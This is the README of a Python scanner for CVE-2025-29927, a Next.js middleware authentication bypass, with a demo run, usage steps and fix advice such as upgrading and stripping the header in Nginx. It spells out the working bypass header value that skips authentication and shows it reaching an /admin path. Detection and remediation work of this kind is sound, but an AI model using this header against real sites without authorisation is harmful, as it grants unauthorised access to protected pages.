π Python-based smart scanner for CVE-2025-29927 β Next.js middleware authentication bypass vulnerability. Detects meta refresh, keyword-based redirects, and more.
# π CVE-2025-29927 - Next.js Middleware Bypass Detector
This Python-based smart scanner helps detect the **CVE-2025-29927** vulnerability in Next.js applications β a critical middleware bypass that allows attackers to skip authentication using a crafted HTTP header.
> π§ The tool identifies not only HTTP redirects but also client-side redirection mechanisms such as `<meta http-equiv="refresh">`, keyword-based login redirects, and silent auth bypasses.
---
## π Features
- β
Interactive input (target URL and path)
- β
Smart detection of:
- `x-middleware-subrequest` bypass headers
- `<meta refresh>` based redirects
- HTML content with keywords like `login`, `sign in`, `authentication`
- β
Color-coded CLI output:
- π© Green for 2xx responses
- π¨ Yellow for 3xx
- π₯ Red for 4xx/5xx
- β
Early exit if bypass is successful
- β
Easy to extend and customize
---
## πΈ Demo
```
$ python3 CVE-2025-29927.py
π Enter the target site URL (e.g. http://localhost:3000): http://vulnerable.local
π Enter the protected path (e.g. /dashboard): /admin
β Testing with header: middleware:middleware:middleware:middleware:middleware
β³ HTTP Status: 200
β³ Redirect detected: No
β
VULNERABLE! Bypass successful with header:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
```
---
## π§βπ» How to Use
### 1. Clone the repository:
```bash
git clone https://github.com/sagsooz/CVE-2025-29927.git
cd CVE-2025-29927
```
### 2. Install dependencies:
```bash
pip install -r requirements.txt
```
### 3. Run the script:
```bash
python3 CVE-2025-29927.py
```
---
## π Project Structure
```
.
βββ CVE-2025-29927.py # Main interactive scanner
βββ requirements.txt # Python dependencies
βββ README.md # This file
```
---
## π¦ requirements.txt
```txt
requests
beautifulsoup4
colorama
```
---
## π‘οΈ How to Fix
If your app is affected, do the following:
1. **Update Next.js** to `v15.2.3` or later (or `14.2.25+` / `13.5.7+`)
2. **Harden middleware routing** and avoid relying solely on middleware for authentication.
3. **Strip x-middleware-subrequest header** at the edge (e.g. Nginx):
```nginx
proxy_set_header x-middleware-subrequest "";
```
---
## βΉοΈ About the Vulnerability
CVE-2025-29927 allows attackers to bypass Next.js middleware checks by manipulating the `x-middleware-subrequest` header with crafted values such as:
```
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
```
In vulnerable versions, this disables middleware execution completely β allowing direct access to protected routes like `/dashboard`, `/admin`, etc.
---
## π¬ Contact
Maintained by: [@mrzblackhat](https://t.me/mrzblackhat)
Feel free to contact me on Telegram for suggestions, improvements, or contributions.
---
## π· Tags
`next.js` `CVE-2025-29927` `bugbounty` `middleware bypass` `authentication` `web security` `python security scanner` `ethical hacking`
---
## π License
This tool is provided for **educational and research purposes only**. Use responsibly.
[4.0K] /data/pocs/bb682c324ce49fd9e8ec603d0403e4dc639d4b2c
βββ [3.7K] CVE-2025-29927.py
βββ [3.1K] README.md
βββ [ 33] requirements.txt
0 directories, 3 files